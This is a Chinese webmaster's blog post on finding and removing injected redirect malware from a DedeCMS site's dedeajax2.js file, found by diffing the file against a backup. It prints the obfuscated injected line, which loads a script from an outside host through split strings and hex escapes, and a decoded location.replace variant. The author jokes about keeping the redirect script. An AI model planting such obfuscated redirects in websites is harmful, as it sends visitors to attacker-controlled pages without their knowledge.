如何检查dedecms中被挂马部分及解决方法

很不幸,前段时间网站被挂了马,导致每次打开网站就被跳转到别的网站。这可难坏了小白站长飞鹿优化。不过经过了一天的努力,终于将被挂马部分找到了,并且顺利解决了这个问题。写出这篇文章供和飞鹿优化一样的小白站长们参考。
一、            具体现象
在浏览器中输入www.fdeer.com回车后就会出现了网站跳转到一个游戏网站上去。然后第二次输入确可以正常访问了。而且换了电脑任然是这种情况。分析为网站被挂马了。
二、           查找方法及解决方式:
1、在网站正常页面右键-查看源代码。显示如下:

和原始代码没有什么异常。
2、在浏览器中按下F12,查看源代码,如下:

看到了红色标示的多余代码。
3、将现在的网站dedeajax2.js和原来备份的网站的dedeajax2.js下载下来使用TextDiff进行对比,发现现在网站的第258行出现了不同。也就是跳转的这段代码。

4、将不同的以下代码删除,保存后上传到原目录。document.write(“<sc”+”ript src=’http://Q”+”.H\x52″+”44″+”.Co”+”\x4d/s”+”.as”+”p?sichuan.chengdu’><\/sc”+”ript>”);
5、更新网站,一切OK。
三、            总结及知识补充
        根据本次的事情,总结以下几点:
1、要养成定期备份网站的习惯。在网站出现异常时能够及时恢复网站。
2、网站的补丁及时打很有必要。
3、此段代码解析:<body text=”white”>
<scriptlanguage=”javascript”>location.replace(“h”+”t”+”t”+”p”+”:”+”/”+”/”+”q”+”.”+”h”+”r”+”4″+”4″+”.”+”c”+”o”+”m”+”/”+”s”+”.”+”a”+”s”+”p”+”?sichuan.chengdu.”);</script></body>   文本颜色为白色,将页面替换为
“h”+”t”+”t”+”p”+”:”+”/”+”/”+”q”+”.”+”h”+”r”+”4″+”4″+”.”+”c”+”o”+”m”+”/”+”s”+”.”+”a”+”s”+”p”+”?sichuan.chengdu.”
即跳转的那个页面。
4、存了一个好的跳转脚本哦。嘿嘿。

●本文来源互联网及网友投稿,如有侵权请及时联系本站进行删除。
●转载原创文章请保留地址及版权信息,否则侵权必究。
●分享目的仅供大家学习和交流,请不要用于商业用途。
●该资源版权归原著作者所有,请于下载后24小时内删除。
●如有链接无法下载、失效或广告,请联系右侧点击QQ咨询处理。
●本站资源售价只是赞助,收取费用仅维持本站的日常运营所需。
●如遇到加密压缩包,默认解压密码为"fdeer.com",如遇到无法解压的请联系管理员。

飞鹿日志 » 如何检查dedecms中被挂马部分及解决方法

发表回复